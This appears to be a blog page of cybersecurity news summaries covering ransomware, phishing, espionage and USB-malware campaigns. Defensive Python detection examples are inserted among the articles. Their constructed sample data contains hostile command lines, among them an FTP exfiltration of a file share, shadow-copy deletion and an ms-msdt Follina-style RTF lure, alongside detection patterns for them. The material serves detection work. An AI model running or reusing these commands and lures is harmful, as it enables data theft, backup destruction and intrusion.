Showing posts with label attackers.

British Library Hit by Cyber Incident, Disrupting Services


The British Library in London, known for its serene study environment and vast collection of 170 million items, has been disrupted by a "cyber incident." This event has led to the shutdown of its website, impeding access to the online catalog, and the cessation of Wi-Fi services. 

Staff members are unable to use computers, creating a pre-digital atmosphere within the library. Ordering books now involves consulting hardback catalogs or external websites, writing down catalog numbers, and handing them to librarians for verification. The incident has affected a wide range of users, including authors and academics, who rely on the library for their work.

Despite the significance of the British Library, the institution has provided minimal information about the incident on social media. The library stated that it is facing a major technology outage due to the cyber incident, impacting both online and on-site services. 

The library is working with Britain's National Cyber Security Centre (NCSC) to investigate the matter. Speculation about the cause of the shutdown abounds among users, many of whom have had to adjust their work plans to accommodate the disruption.

While details remain scarce, other European libraries presume the British Library was deliberately targeted. The National Library of Scotland, for instance, has intensified its monitoring and protection in response to the attack. 

This incident underscores a shift in cybercriminals' targeting toward libraries, which have traditionally flown under the radar. Tasmina Islam, a cybersecurity education lecturer, suggests that financial motives may be driving such attacks: libraries hold valuable information, including personal data and intellectual property. She emphasizes the need for libraries and similar institutions to strengthen their security measures.

Within the British Library, employees are puzzled by the event, describing it as a "nightmare." However, not all users are dismayed by the interruption. Eric Langley, a Shakespeare scholar, finds the blackout oddly liberating, allowing him to focus solely on the bard's work. Nevertheless, he acknowledges that an extended disruption would pose challenges.

Europe's Shipping Industry Grapples with Widespread Cyberattack


A significant cyberattack has impacted shipping companies across Europe, beginning on Thursday afternoon. The attack, believed to be a Distributed Denial of Service (DDoS) incident, has left numerous websites unavailable. IT teams are currently working to restore service.

Johanna Boijer-Svahnström, the Senior Vice President of Viking Line, discussed the extensive cyberattack that occurred on Thursday. In a statement to HBL, she emphasized that the cyber assault had a notable impact on major shipping companies operating throughout Europe.

"It appears to be a DDoS cyber attack targeting shipping companies across Europe. Our webpages are currently inaccessible, and our IT department is actively working to resolve the issue," Johanna conveyed to HBL.

The Cyber Express reached out to the company to verify the security incident and gather additional information following the cyberattack. Regrettably, at the time of preparing this report, no confirmation has been received from Viking Line.

According to media reports, the Viking Line incident appears to have been a DDoS attack that overloaded the company's website. The same assault had a widespread impact, affecting nearly all major shipping companies in the region.

About Viking Line

Viking Line, established in 1959, is a prominent shipping company specializing in cruise, cargo, and passenger services primarily within the Baltic Sea region. The company maintains a fleet of more than 50 vessels offering services in all three categories, with a current workforce of over 2,000 employees.

A recent report citing research conducted by the law firm HFW suggests that the shipping industry is considered an "easy target" for cybercriminals. The same report indicates a notable increase in ransomware attacks, with ransom demands rising by an astounding 350% over the past year.

"Our findings reveal that despite improvements in maritime cybersecurity, the industry remains vulnerable. Shipping organizations are facing a surge in cyberattacks, along with a substantial increase in ransom payment demands. As technology continues to play a larger role across all aspects of shipping, encompassing ship networks, offshore installations, and onshore control centers, the potential for cybersecurity breaches also escalates," reported Heavylift PFI, quoting Tom Walters, a partner at Holman Fenwick Willan (HFW), a global law firm.

Incidents like the Viking Line cyberattack underscore the critical importance of robust cybersecurity measures within the shipping industry. They are a reminder that a proactive approach to security, including DDoS mitigation for public-facing services, is needed across sectors before the next incident, not after it.

Rival Cybercrime Groups Offer Conflicting Accounts of Casino Attack


In the latest development, members of the hacking group Scattered Spider have asserted that they were the initial perpetrators of the MGM network breach last week. 

However, the ransomware gang Alphv, also known as Black Cat, countered this claim with a detailed statement on their dark-web platform, insisting that they were the true culprits.

Alphv's statement, while claiming responsibility, left a crucial question unanswered: whether Scattered Spider was acting as an affiliate of Alphv or an independent group utilizing Alphv-developed ransomware. This conflicting narrative is further muddying an already tumultuous news cycle, marked by speculative discussions on social media.

Definitive confirmation regarding the identity of the MGM attacker remains elusive until either the company or law enforcement authorities release public details about the incident. 

Both Scattered Spider and Alphv represent significant cyber threats in their own right, according to experts. Scattered Spider, believed to be comprised of young adults in the U.S. and the U.K., is notorious for employing social engineering tactics in their attacks. 

Charles Carmakal, CTO at Google Cloud's Mandiant, noted their recent use of Alphv's encryption. Their past exploits include a high-profile attack affecting over 130 organizations, resulting in the theft of more than 10,000 employees' login credentials.

Meanwhile, Alphv, thought to be based in Russia, has earned a reputation for conducting ruthless and widespread attacks. Their tactics have included releasing sensitive images from breast cancer patients' examinations while extorting the Lehigh Valley Health Network earlier this year. Notable victims have also included Western Digital and Sun Pharmaceuticals.

In the realm of ransomware, identities are intentionally obscured to hinder law enforcement's efforts to trace attacks back to their source. It's not uncommon for a major ransomware operator to claim credit for an attack initiated by an affiliate. Additionally, a larger group like Alphv could independently carry out an entire attack internally.

Ultimately, MGM, in conjunction with the FBI and third-party cyber incident response firms, will possess the most reliable information regarding the assailant's identity and the specifics of how the breach occurred.

Espionage Group Suspected of Intruding Into an Asian Nation's Power Grid


Earlier this year, cyber attackers targeted an undisclosed Asian country's national power grid using ShadowPad malware, commonly associated with entities linked to the Chinese government, according to cybersecurity experts. 

While Symantec did not explicitly attribute the incident to China, it identified the group as RedFly, which infiltrated the network for up to six months, siphoning credentials and compromising multiple computers. 

ShadowPad, which first emerged in 2017, has also been linked to the APT41 hacking group, which researchers have connected to China's Ministry of State Security and the People's Liberation Army. In recent years, various China-linked groups have employed ShadowPad for cyber-espionage activities.

The attack's initial signs emerged on February 28, when ShadowPad was deployed on a single computer, Symantec reported. The malware reappeared in the network on May 17, indicating that the attackers had retained access for roughly two and a half months by that point.

Over the following week, the attackers worked to broaden their access to storage devices, collect system credentials, and conceal their tracks. They utilized the legitimate Windows application oleview.exe to gain insights into the victim's network and move laterally.

Dick O'Brien, principal intelligence analyst at Symantec Threat Hunter, expressed concern about the escalating trend of hackers targeting critical national infrastructure (CNI) with malware. He highlighted that attacks on CNI are particularly worrisome due to the potential for serious disruption, and emphasized that this incident is part of a broader pattern.

Experts warn that the frequency of attacks on CNI organizations has risen over the past year, posing a heightened risk of disruptions to power supplies and essential services during times of heightened political tension.

While Symantec has not observed disruptive actions from RedFly, they acknowledge that such actions have occurred in other regions, underscoring the potential threat.

ShadowPad has been identified in cyberattacks on seven electricity grid management facilities in Northern India, as well as Pakistani government agencies, a state bank, and a telecommunications provider. Critical industries in various countries across Asia and Europe have also been targeted with ShadowPad and other malicious tools.

Designed as a successor to Korplug/PlugX, another popular strain among some Chinese espionage groups, ShadowPad briefly appeared on underground forums, making it challenging for researchers to attribute all instances of its use directly to China-based actors.

LockBit Ransomware Falters, Attackers Deploy New '3AM' Malware


In a recent cyberattack targeting a construction company, hackers attempted to deploy the LockBit ransomware on a target network but were thwarted. In an unexpected twist, they resorted to a previously unknown ransomware variant called 3AM, successfully infiltrating the system.

The newly discovered ransomware, 3AM, follows a fairly typical pattern by disabling various cybersecurity and backup-related software before encrypting files on the compromised computer. However, it stands out with an unusual theme: the name 3AM, a reference to the eerie hour when only insomniacs, night owls, and malicious hackers are typically active.

Researchers from Symantec highlighted this double-pronged attack in their recent report. It marked the first documented instance of 3AM being used alongside the LockBit ransomware on the same compromised network.

Dick O'Brien, the principal intelligence analyst for the Symantec threat hunter team, cautioned, "This isn't the first time we've seen attackers employ multiple ransomware families simultaneously, and organizations should be prepared for such scenarios."

Upon gaining access to the target network, the threat actors wasted no time gathering user information and deploying tools for data extraction. They utilized tools like Cobalt Strike and PsExec to escalate privileges and performed reconnaissance tasks such as identifying users and network status. They also sought out other servers for lateral movement and established a new user for persistence. Subsequently, they employed the Wput utility to transfer the victim's files to their FTP server.

Their initial plan was to deploy LockBit ransomware, but the target's robust cybersecurity defenses prevented its execution. Unfortunately for the victim, the attackers had an alternative weapon at their disposal: 3AM ransomware. This malware is characterized by its encryption of files with the ".threeamtime" suffix and references to the time of day in its ransom note.

The ransom note began with an ominous message: "Hello, '3 am' The time of mysticism, isn't it? All your files are mysteriously encrypted, and the systems 'show no signs of life,' the backups disappeared. But we can correct this very quickly and return all your files and operation of the systems to [sic] original state."

In contrast to the creative ransom note, the authors displayed less innovation in the design of the malware itself. 3AM is a 64-bit executable written in Rust, a language increasingly used by malware authors as well as legitimate developers. It attempts to terminate various security and backup-related software on the infected machine before proceeding with its primary tasks: scanning the disk, identifying specific file types, encrypting them, dropping the ransom note, and deleting any Volume Shadow Copy Service (VSS) snapshots that could offer a potential lifeline to the victim.

In this particular attack, the hackers only succeeded in deploying 3AM on three machines, with two of them subsequently blocking the malware. However, the third machine was compromised successfully, where LockBit had failed. While the attackers claimed to have stolen sensitive data from this machine, Symantec couldn't independently verify this claim.

When it comes to defending against ransomware attacks, especially multi-faceted ones like this, O'Brien recommends a defense-in-depth strategy. He emphasizes that organizations should focus on addressing all stages of a potential attack rather than solely concentrating on blocking the ransomware payloads. He underscores the importance of early intervention in thwarting cyberattacks, stating that "the earlier you stop an attack, the better."
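The "earlier you stop an attack, the better" advice is easiest to act on when the pre-encryption steps above (the Wput upload to FTP, the mass stopping of backup and security services, the shadow-copy deletion) are detected as a chain rather than waiting for the ransomware payload. The following is an added example, not Symantec's or the page's code, of that detection logic run over constructed endpoint telemetry. The `.threeamtime` suffix and the Wput-to-FTP exfiltration come from the report summarized above; the JSON field names, the exact command lines used to delete shadow copies and stop services, and the threshold of three stop/kill commands are assumptions about how a generic EDR export and this tradecraft usually look.

```python
"""Detection chain for the 3AM / LockBit tradecraft described above.

Added example over constructed telemetry; not Symantec's or the page's code.
Event schema (ts, host, event, cmd, path) is an assumed generic EDR export.
"""
import json
import re
from collections import defaultdict

# Constructed sample telemetry, newline-delimited JSON. Host FS01 shows the
# attack chain; WS22 is benign user activity.
SAMPLE_EVENTS = r'''
{"ts": "2023-09-05T03:01:10Z", "host": "FS01", "event": "process", "cmd": "cmd.exe /c whoami /all"}
{"ts": "2023-09-05T03:02:44Z", "host": "FS01", "event": "process", "cmd": "wput.exe -u C:\\share\\finance\\ ftp://198.51.100.7/up/"}
{"ts": "2023-09-05T03:04:02Z", "host": "FS01", "event": "process", "cmd": "net stop MSSQL$SQLEXPRESS /y"}
{"ts": "2023-09-05T03:04:05Z", "host": "FS01", "event": "process", "cmd": "net stop VSS /y"}
{"ts": "2023-09-05T03:04:09Z", "host": "FS01", "event": "process", "cmd": "taskkill /F /IM backup_agent.exe"}
{"ts": "2023-09-05T03:04:20Z", "host": "FS01", "event": "process", "cmd": "vssadmin.exe delete shadows /all /quiet"}
{"ts": "2023-09-05T03:05:01Z", "host": "FS01", "event": "file", "path": "C:\\share\\finance\\q3.xlsx.threeamtime"}
{"ts": "2023-09-05T03:05:02Z", "host": "FS01", "event": "file", "path": "C:\\share\\finance\\RECOVER-FILES.txt"}
{"ts": "2023-09-05T09:15:00Z", "host": "WS22", "event": "process", "cmd": "outlook.exe"}
{"ts": "2023-09-05T09:16:00Z", "host": "WS22", "event": "file", "path": "C:\\Users\\amy\\report.docx"}
'''

# Rule patterns. The shadow-copy deletion and service-stop command lines are
# assumptions about how those steps usually appear; the page only says the
# malware erases VSS copies and terminates backup/security software.
SHADOW_DELETE = re.compile(
    r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete|win32_shadowcopy.*?delete",
    re.I,
)
SERVICE_KILL = re.compile(r"^(?:net1?(?:\.exe)?\s+stop|sc(?:\.exe)?\s+stop|taskkill(?:\.exe)?)\b", re.I)
WPUT_FTP = re.compile(r"\bwput(?:\.exe)?\b.*\bftp://", re.I)   # from the report
THREEAM_EXT = re.compile(r"\.threeamtime$", re.I)                # from the report
MASS_STOP_THRESHOLD = 3  # assumption: 3+ stop/kill commands on one host is abnormal


def parse_events(text):
    """Parse newline-delimited JSON into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyze(events):
    """Return {host: sorted rule names} for every host with at least one hit."""
    hits = defaultdict(set)
    stops = defaultdict(int)
    for ev in events:
        host = ev["host"]
        if ev["event"] == "process":
            cmd = ev.get("cmd", "")
            if SHADOW_DELETE.search(cmd):
                hits[host].add("shadow_copy_deletion")
            if SERVICE_KILL.search(cmd):
                stops[host] += 1
            if WPUT_FTP.search(cmd):
                hits[host].add("ftp_upload_wput")
        elif ev["event"] == "file":
            if THREEAM_EXT.search(ev.get("path", "")):
                hits[host].add("threeam_extension")
    for host, n in stops.items():
        if n >= MASS_STOP_THRESHOLD:
            hits[host].add("mass_service_stop")
    return {h: sorted(r) for h, r in hits.items()}


def earliest_alert(events):
    """Timestamp of the first pre-encryption signal (exfil or shadow-copy
    deletion), i.e. the point where intervention still saves the data."""
    for ev in sorted(events, key=lambda e: e["ts"]):
        cmd = ev.get("cmd", "")
        if ev["event"] == "process" and (SHADOW_DELETE.search(cmd) or WPUT_FTP.search(cmd)):
            return ev["ts"]
    return None


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for host, rules in analyze(evs).items():
        print(host, rules)
    print("first pre-encryption signal:", earliest_alert(evs))
```

In the constructed data the Wput upload fires more than two minutes before the first `.threeamtime` file appears, which is the window O'Brien is pointing at: the exfiltration and backup-tampering rules are the ones worth alerting on, because by the time the extension rule matches the encryption has already begun.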

EvilProxy Phishing Campaign Targets Microsoft 365 Executives Worldwide


Cybercriminals have launched an EvilProxy phishing campaign with the aim of infiltrating thousands of Microsoft 365 user accounts across the globe. 

Between March and June, the attackers sent roughly 120,000 phishing emails to more than 100 organizations worldwide. The primary objective of the operation was to compromise high-ranking executive accounts, paving the way for deeper follow-on attacks within those enterprises.

Researchers from Proofpoint have shed light on the ongoing campaign, revealing that it employs a range of phishing strategies, including brand impersonation, scan blocking, and a multi-step infection process. 

These tactics have enabled the attackers to successfully seize control of cloud accounts belonging to top-level executives. Notably, over the past half-year, there has been an alarming surge of over 100% in these takeover incidents. These breaches occurred within organizations that collectively represent 1.5 million employees globally.

The attackers leveraged the EvilProxy phishing-as-a-service platform, which uses a reverse proxy and cookie injection. Because the victim authenticates against the real Microsoft 365 login through the attacker's proxy, the proxy captures both the password and the resulting session cookie, which lets the attackers bypass code- and push-based multi-factor authentication (MFA). Phishing-resistant methods that are bound to the legitimate origin, such as FIDO2 security keys, are not defeated by this relay technique, but they were not what the targeted accounts were using. Reverse-proxy kits like EvilProxy are making it increasingly easy for malicious actors to get past conventional MFA.

Upon capturing the credentials and authenticated session, the attackers wasted no time in accessing executives' cloud accounts, achieving entry in mere seconds. They then maintained control by using a native Microsoft 365 application to register their own MFA method in the account's "My Sign-Ins" section. The favored method for this was "Authenticator App with Notification and Code."

Surprisingly, the researchers noted that there has been a rise in account takeovers among tenants with MFA protection. Their data suggests that at least 35% of all compromised users over the past year had MFA enabled.
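The persistence step above (registering a new authenticator seconds after the stolen session is used) is one of the few reliable signals in a reverse-proxy attack, because the sign-in itself looks like a legitimate MFA-satisfied login. The following is an added example, not Proofpoint's or the page's code, of correlating sign-in and audit events to flag an MFA-method registration that follows a sign-in from a network the user has never used before. The field names assume a generic export of sign-in and audit logs rather than any product's exact schema, the 30-day baseline and 30-minute window are assumptions, and the sample data is constructed.

```python
"""Flag MFA-method registration that follows a sign-in from an unfamiliar IP.

Added example over constructed events; not Proofpoint's code. Field names
(ts, user, ip, ok, activity, detail) assume a generic log export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

BASELINE_DAYS = 30               # assumption: how far back "known" IPs are learned
WINDOW = timedelta(minutes=30)   # assumption: sign-in to registration gap worth flagging
REGISTRATION = "User registered security info"


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


# Constructed sample data. The CFO's account is taken over on 12 June from
# 203.0.113.10, a network never seen in the baseline; ops@ is normal activity.
SIGN_INS = [
    {"ts": "2023-05-02T09:00:00Z", "user": "cfo@example.com", "ip": "198.51.100.5", "ok": True},
    {"ts": "2023-05-18T09:10:00Z", "user": "cfo@example.com", "ip": "198.51.100.5", "ok": True},
    {"ts": "2023-06-12T08:02:11Z", "user": "cfo@example.com", "ip": "203.0.113.10", "ok": True},
    {"ts": "2023-05-03T10:00:00Z", "user": "ops@example.com", "ip": "198.51.100.9", "ok": True},
    {"ts": "2023-06-12T10:30:00Z", "user": "ops@example.com", "ip": "198.51.100.9", "ok": True},
]
AUDIT = [
    {"ts": "2023-06-12T08:02:40Z", "user": "cfo@example.com", "activity": REGISTRATION,
     "detail": "Authenticator App with Notification and Code"},
    {"ts": "2023-06-12T10:45:00Z", "user": "ops@example.com", "activity": REGISTRATION,
     "detail": "Authenticator App with Notification and Code"},
    {"ts": "2023-06-12T11:00:00Z", "user": "ops@example.com", "activity": "Update user",
     "detail": "Title changed"},
]


def baseline_ips(sign_ins, before):
    """IPs each user successfully signed in from before the cutoff."""
    known = defaultdict(set)
    for s in sign_ins:
        if s["ok"] and parse_ts(s["ts"]) < before:
            known[s["user"]].add(s["ip"])
    return known


def suspicious_mfa_registrations(sign_ins, audit):
    """Return one alert per (registration, preceding sign-in from an unknown IP)."""
    alerts = []
    for a in audit:
        if a["activity"] != REGISTRATION:
            continue
        when = parse_ts(a["ts"])
        known = baseline_ips(sign_ins, when - timedelta(days=BASELINE_DAYS))[a["user"]]
        for s in sign_ins:
            if s["user"] != a["user"] or not s["ok"]:
                continue
            gap = when - parse_ts(s["ts"])
            if timedelta(0) <= gap <= WINDOW and s["ip"] not in known:
                alerts.append({
                    "user": a["user"],
                    "ip": s["ip"],
                    "method": a["detail"],
                    "seconds_after_signin": int(gap.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in suspicious_mfa_registrations(SIGN_INS, AUDIT):
        print(alert)
```

The rule deliberately keys on the registration event rather than the sign-in: a reverse-proxied login carries a valid MFA claim and passes every per-login check, while adding a second authenticator from a brand-new network within half a minute of first contact is something a real executive almost never does. In practice you would enrich the IP with ASN or hosting-provider data and revoke sessions on a hit, not just alert.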

The EvilProxy attack typically commences with attackers masquerading as trusted services such as Concur, DocuSign, and Adobe. They send phishing emails from spoofed addresses, purportedly originating from these services, containing links to malicious Microsoft 365 phishing sites.

Clicking on these links initiates a multi-step infection process involving redirects to legitimate sources like YouTube, followed by further redirects utilizing malicious cookies and 404 errors. This convoluted approach is designed to scatter the traffic, minimizing the chances of detection.

Ultimately, the user traffic arrives at an EvilProxy phishing framework—a landing page functioning as a reverse proxy. This page imitates recipient branding and third-party identity providers.

Despite the large number of attacks, the cybercriminals exhibited precision, specifically targeting top-tier executives. C-level executives were the focus in approximately 39% of the attacks, with 17% targeting CFOs and 9% aimed at presidents and CEOs.

The success of this campaign in defeating MFA, and its scale, underscore the advancing sophistication of phishing attacks. Organizations need to bolster their security measures and adopt proactive threat intelligence to detect anomalous activity, emerging threats, and potential vulnerabilities.

While the effectiveness of EvilProxy as a phishing tool is acknowledged, there remains a significant gap in public awareness regarding its risks and implications. 

Proofpoint recommends a series of steps to mitigate phishing risks, including blocking and monitoring malicious email threats, identifying account takeovers, detecting unauthorized access to sensitive cloud resources, and isolating potentially malicious sessions initiated through email links.

SolarWinds Hackers Dangle BMWs to Eavesdrop on Diplomats


The Russia-backed group responsible for the SolarWinds attack, known as Cloaked Ursa or Nobelium/APT29, has shifted its tactics and is now targeting foreign diplomats working at embassies in Ukraine. Instead of using traditional political lures, the group is employing more personalized approaches to entice victims into clicking on malicious links.

Researchers from Palo Alto Networks' Unit 42 have been monitoring the activities of Cloaked Ursa and discovered that the initial lure in the campaign involved a legitimate flyer advertising the sale of a used BMW sedan in Kyiv. The flyer, which was originally shared by a diplomat within the Polish Ministry of Foreign Affairs, caught the attention of potential victims, particularly new arrivals to the region. 

Exploiting this opportunity, Cloaked Ursa created a counterfeit version of the flyer and sent it to multiple diplomatic missions as bait for its malware campaign. The malicious message contained a link that promised additional photos of the car but instead executed malware in the background when clicked.

The malware payload used by Cloaked Ursa is JavaScript-based and provides the attackers with a backdoor into the victim's system, enabling them to load further malicious code through a command-and-control connection. 

The group meticulously compiled its target list, using publicly available embassy email addresses for 80% of the victims and unpublished email addresses for the remaining 20%. This deliberate selection aimed to maximize their access to desired networks.

While the researchers observed the campaign being conducted against 22 out of the 80 foreign missions in Ukraine, they suspect that the actual number of targets is higher. The extensive scope of the attacks is remarkable for operations that are typically secretive and narrowly focused.

In a strategic shift, Cloaked Ursa has moved away from using job-related topics as bait and instead crafted lures that appeal to recipients' personal interests and desires. This change aims to increase the campaign's success rate by compromising not only the initial targets but also others within the same organization, extending its reach. 

The researchers noted that these unconventional lures have broad applicability across the diplomatic community and are more likely to be forwarded to other individuals within and outside the organization.

Cloaked Ursa, also known as Nobelium/APT29, is a state-sponsored group associated with Russia's Foreign Intelligence Service (SVR). The group gained notoriety for the SolarWinds attack, which involved a backdoor discovered in December 2020 and affected approximately 18,000 organizations through infected software updates.

Since then, the group has remained active, targeting foreign ministries, diplomats, and the US government, exhibiting sophistication in both tactics and custom malware development.

To mitigate APT cyberattacks like those conducted by Cloaked Ursa, the researchers provided some recommendations for diplomatic personnel. They advised administrators to educate newly assigned diplomats about cybersecurity threats specific to the region before their arrival. 

Additionally, individuals should exercise caution when downloading files, even from seemingly legitimate sources, and be vigilant about URL redirection when using URL-shortening services, as this could be indicative of a phishing attack. Verifying file extension types and avoiding files with mismatched or obfuscated extensions is crucial to prevent falling victim to phishing attempts. 

Finally, the researchers suggested that diplomatic employees disable JavaScript as a preventive measure, rendering JavaScript-based malware unable to execute.
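The advice above on verifying file extensions and refusing files with mismatched or obfuscated extensions is easy to state and easy to get wrong, because the tricks that matter (a script extension hidden behind a decoy image extension, a right-to-left override character that reverses how the name is drawn, a claimed type that the file's first bytes contradict) are invisible in a normal file listing. The following is an added example, not Unit 42's or the page's code, of a checker that applies those rules to a filename and to a file's leading bytes. The lists of risky and decoy extensions and the magic-number table are assumptions drawn from common phishing tradecraft, not from the report.

```python
"""Flag filenames and contents that use common extension-deception tricks.

Added example, not Unit 42's code. Extension lists and signatures are assumptions.
"""
import unicodedata

# Extensions Windows will run, or that commonly wrap a script or payload (assumption).
RISKY_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "hta", "lnk", "scr", "exe",
              "bat", "cmd", "ps1", "iso", "img", "msi"}
# Harmless-looking extensions used as the decoy half of a double extension (assumption).
DECOY_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx", "xls", "xlsx", "txt"}
# Leading bytes for a few claimed types (assumption; enough to catch an EXE named .jpg).
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG", "gif": b"GIF8",
    "pdf": b"%PDF", "zip": b"PK\x03\x04", "docx": b"PK\x03\x04", "exe": b"MZ",
}
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE


def rendered_name(name):
    """What a bidi-naive reader sees: text after a RIGHT-TO-LEFT OVERRIDE is drawn reversed."""
    i = name.find(RLO)
    if i < 0:
        return name
    return name[:i] + name[i + 1:][::-1]


def assess_filename(name):
    """Return a list of findings for the name alone (no file contents needed)."""
    findings = []
    if any(unicodedata.category(c) == "Cf" for c in name):
        findings.append("bidi_or_invisible_control_char")
    tokens = [t.strip().lower() for t in name.split(".")]
    ext = tokens[-1] if len(tokens) > 1 else ""
    if ext in RISKY_EXTS:
        findings.append("risky_extension:" + ext)
    if len(tokens) > 2 and ext in RISKY_EXTS and any(t in DECOY_EXTS for t in tokens[1:-1]):
        findings.append("double_extension")
    if "     " in name:  # long space runs push the real extension out of view
        findings.append("whitespace_padding")
    return findings


def content_matches_extension(data, ext):
    """True/False when the claimed extension has a known signature; None if unknown."""
    sig = MAGIC.get(ext.lower())
    if sig is None:
        return None
    return data.startswith(sig)


if __name__ == "__main__":
    # Constructed lure names in the spirit of the "more photos of the car" link above.
    for n in ["BMW_photos.zip", "car_photos.jpg.js", "photos_" + RLO + "gpj.js",
              "photo.jpg                      .hta"]:
        print(repr(n), "->", rendered_name(n), assess_filename(n))
    print(content_matches_extension(b"MZ\x90\x00\x03", "jpg"))   # an EXE claiming to be a JPEG
```

`rendered_name` is the part people are usually surprised by: `photos_<RLO>gpj.js` is shown by the file manager as `photos_sj.jpg`, so the user believes they are opening an image while the extension the shell actually dispatches on is `.js`. Checking the leading bytes against the claimed extension catches the complementary case where the name is honest but the content is not.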

Sharp Increase in Malware Attacks via USB Flash Drives


Instances of cybercriminals employing USB drives for malware attacks have seen a significant rise. According to security researchers from Mandiant, there has been a three-fold increase in malware attacks via USB drives aimed at stealing sensitive information during the first half of 2023. These researchers have disclosed details regarding two specific attack campaigns.

One of the attack campaigns, attributed to the China-linked cyberespionage group TEMP.Hex, targeted both public and private organizations in Europe, Asia, and the U.S. The attackers utilized USB flash drives to introduce the SOGU malware into compromised systems and extract valuable data. 

The flash drives carried several malicious components and used a DLL hijacking technique to load the final payload into memory on the compromised system. Once running, the SOGU malware carried out actions such as capturing screenshots, recording keystrokes, establishing reverse shell connections, and enabling remote desktop connections for executing additional files. 

The stolen data was sent to the attackers' command and control (C2) server using a custom binary protocol over TCP, UDP, or ICMP. Industries targeted by this attack campaign included construction, engineering, government, manufacturing, retail, media, and pharmaceutical sectors.

In the second campaign, victims were enticed to click on a file that appeared to be a legitimate executable in the root folder of a USB drive. Executing this file triggered an infection chain that delivered a shellcode-based backdoor named SNOWYDRIVE.

The malware not only copied itself to removable drives connected to infected systems but also performed various other operations, such as writing or deleting files, initiating file uploads, and executing reverse shell commands.

Recently, the Check Point Research Team uncovered a new USB-based attack campaign attributed to a China-based group called Camaro Dragon. 

The campaign specifically targeted a healthcare institution in Europe and involved the deployment of several updated versions of malware toolsets, including WispRider and HopperTick. It was reported that Camaro Dragon effectively utilized USB drives to launch attacks in Myanmar, South Korea, Great Britain, India, and Russia.

Organizations are strongly advised to prioritize access restrictions on USB devices and conduct comprehensive scans for malicious files before connecting them to their networks. 

Additionally, organizations should improve their awareness and understanding of such campaigns so they can defend against them from the outset, for example by feeding a threat intelligence platform (TIP) with the tactical and technical indicators (file hashes, payload names, C2 patterns) that reports like these publish.

This Threat Actor Targeted NATO Summit Attendees


A Russia-linked threat actor known as RomCom has been targeting entities supporting Ukraine, including guests at the 2023 NATO Summit. The summit is taking place in Vilnius, Lithuania, and will discuss the war in Ukraine and new memberships in NATO, including Sweden and Ukraine itself.

RomCom has created malicious documents that are likely to be distributed to supporters of Ukraine. The threat actor appears to have dry-tested the delivery of these documents on June 22, a few days before the command-and-control (C&C) domain used in the campaign went live, BlackBerry explained.

The malicious documents are likely distributed via spear-phishing. They contain an embedded RTF file and OLE objects that kick off an infection chain, which collects system information and delivers the RomCom remote access trojan (RAT).

At one stage in the infection chain, a flaw in Microsoft's Support Diagnostic Tool (MSDT) – CVE-2022-30190, also known as Follina – is exploited for remote code execution (RCE).
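Follina-style documents are worth catching before they are opened, because the exploit runs from a relationship or field the document carries rather than from a macro. The following is an added example, not BlackBerry's or the page's code, of a scanner that looks for the two indicators public analysis of CVE-2022-30190 made well known: an Office document whose relationships point an OLE object at an external (typically `mhtml:`/`http:`) target, and an `ms-msdt:` scheme reference, together with an RTF OLE object marked to auto-update on open. The sample documents are constructed in memory; the RTF control-word heuristic and the TEST-NET address in the sample are assumptions, and the scanner is a heuristic, not a full Office parser.

```python
"""Heuristic scanner for CVE-2022-30190 (Follina) style lure documents.

Added example; not BlackBerry's code. Samples are constructed in memory.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Public indicators: the MSDT URL scheme and the diagnostic pack it invokes.
MSDT = re.compile(rb"ms-msdt:|PCWDiagnostic", re.I)
# RTF control words that make an OLE object refresh when the document opens (assumption
# about how the RTF variant is usually built; the page only says RTF + OLE objects).
RTF_AUTOUPDATE = re.compile(rb"\\objupdate|\\objautlink", re.I)


def scan_ooxml(data):
    """Walk a .docx/.xlsx/.pptx zip: flag external OLE relationships and ms-msdt strings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(blob)
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL:
                        findings.append(f"external OLE relationship in {name}: {rel.get('Target')}")
            if MSDT.search(blob):
                findings.append(f"ms-msdt reference in {name}")
    return findings


def scan_rtf(data):
    findings = []
    if MSDT.search(data):
        findings.append("ms-msdt reference in RTF")
    if b"\\object" in data and RTF_AUTOUPDATE.search(data):
        findings.append("RTF OLE object set to auto-update on open")
    return findings


def scan_document(data):
    """Dispatch on file signature; returns a list of human-readable findings."""
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    if data.startswith(b"{\\rtf"):
        return scan_rtf(data)
    return []


def build_sample_docx(external_target=None):
    """Constructed minimal .docx; with external_target set, the document relationships
    carry an external OLE link the way a Follina lure does."""
    rel = ""
    if external_target:
        rel = f'<Relationship Id="rId5" Type="{OLE_REL}" Target="{external_target}" TargetMode="External"/>'
    rels = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">{rel}</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", f'<w:document xmlns:w="{WORD_NS}"/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed RTF sample: an auto-updating OLE object plus an ms-msdt hyperlink field.
SAMPLE_RTF = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata 00}}"
              b"{\\field{\\*\\fldinst HYPERLINK \"ms-msdt:/id PCWDiagnostic\"}}}")

if __name__ == "__main__":
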